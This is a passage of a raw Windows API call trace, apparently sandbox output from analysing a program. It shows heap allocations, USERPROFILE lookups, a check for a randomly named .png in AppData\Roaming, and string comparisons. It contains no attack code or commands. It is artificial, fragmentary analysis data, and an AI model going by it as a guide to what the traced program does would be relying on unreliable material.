(in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6e) returned 0x29f3f58 [0122.222] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DjTk 0Dq17Pz4t2AMa.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\DjTk 0Dq17Pz4t2AMa.png", lpFilePart=0x8cf650*="DjTk 0Dq17Pz4t2AMa.png") returned 0x36 [0122.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0122.222] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DjTk 0Dq17Pz4t2AMa.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\djtk 0dq17pz4t2ama.png")) returned 0xffffffff [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.223] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.223] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.223] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0122.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0122.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DZjNZY.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZjNZY.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNZY.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NZY.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZY.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0122.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0122.224] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0122.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0122.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6ea0 [0122.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0122.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DZjNZY.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZjNZY.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNZY.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NZY.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZY.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.227] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0122.227] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0122.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0122.228] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.228] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0122.229] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.230] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0122.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.231] 